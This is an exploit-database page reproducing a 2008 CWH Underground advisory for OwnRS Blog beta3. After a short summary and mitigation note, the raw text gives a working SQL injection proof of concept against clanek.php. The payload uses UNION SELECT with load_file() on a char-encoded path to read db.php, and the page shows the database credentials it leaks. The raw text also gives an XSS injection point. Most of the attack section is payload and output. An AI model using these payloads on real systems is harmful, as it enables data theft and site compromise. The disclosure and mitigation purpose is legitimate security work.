header-logo
Suggest Exploit
vendor:
OwnRS
by:
CWH Underground
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: OwnRS
Affected Version From: Beta3
Affected Version To: Beta3
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

OwnRS Blog beta3 (SQL/XSS) Multiple Remote Vulnerabilities

A vulnerability exists in OwnRS Blog beta3, which allows an attacker to inject arbitrary SQL commands via the 'id' parameter in the 'clanek.php' script. The vulnerability is due to the application not properly sanitizing user-supplied input. An attacker can exploit this vulnerability to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation could result in the manipulation of queries, information disclosure, and could potentially allow an attacker to gain unauthorized access to the application.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to dynamically construct SQL queries. Additionally, parameterized queries should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

==============================================================
  OwnRS Blog beta3 (SQL/XSS) Multiple Remote Vulnerabilities
==============================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 19 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : OwnRS
 VERSION     : Beta3
 VENDOR	     : N/A
 DOWNLOAD    : http://downloads.sourceforge.net/ownrs
#####################################################

--- Remote SQL Injection ---

**magic_quote must turn off**

------------------------------
 Vulnerable File (clanek.php)
------------------------------

@ Line 66

[+] $vysledek=mysql_query("select * from clanky where id= '" . $id . "'") or die (mysql_error());

----------
 Exploit
----------

[+] http://[Target]/[Ownrs_path]/clanek.php?id=[SQL Injection]

-------------
 POC Exploit
-------------

[+] http://localhost/own/clanek.php?id=1'/**/UNION/**/ALL/**/SELECT/**/1,2,load_file(char(67,58,92,120,97,109,112,112,92,104,116,100,111,99,115,92,79,119,110,92,100,98,46,112,104,112)),4,5,6,7,8,9,10/**/FROM/**/autori/**/WHERE/**/id='1

When you view source, You can see

@Line 87

[+] <h1><a href="clanek.php?id=1'/**/UNION/**/ALL/**/SELECT/**/1,2,load_file(char(67,58,92,120,97,109,112,112,92,104,116,100,111,99,115,92,79,119,110,92,100,98,46,112,104,112)),4,5,6,7,8,9,10/**/FROM/**/autori/**/WHERE/**/id='1"><?php
[+] $spojeni= mysql_connect(
[+] //server
[+] "localhost",
[+] //login
[+] "xampp",
[+] //heslo
[+] "xampp" );
[+] //databáze
[+] mysql_select_db("databaze",$spojeni);
[+] ?>
[+] </a></h1>
[+] 45<p class="right"><strong><a href="index.php?kat=9">
[+] <div class="cara"><span class="schovat">cara</span></div>
      

---------------------
 Exploit Description
---------------------

    This exploit use load_file() to view source files (load_file() can only use with Mysql5+)

load_file(char(67,58,92,120,97,109,112,112,92,104,116,100,111,99,115,92,79,119,110,92,100,98,46,112,104,112))
will open C:\xampp\htdocs\Own\db.php


--- Remote XSS Exploit ---

------------------------------
 Vulnerable File (clanek.php)
------------------------------

@ Line 69

[+] <h1><a href="clanek.php?id=<?echo $id?>"><?echo $zaznam["nadpis"]?></a></h1>

---------
 Exploit
---------

[+] http://[Target]/[Ownrs_path]/clanek.php?id=<XSS>


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-19]

Navigation

Suggest Exploit

Services By CQR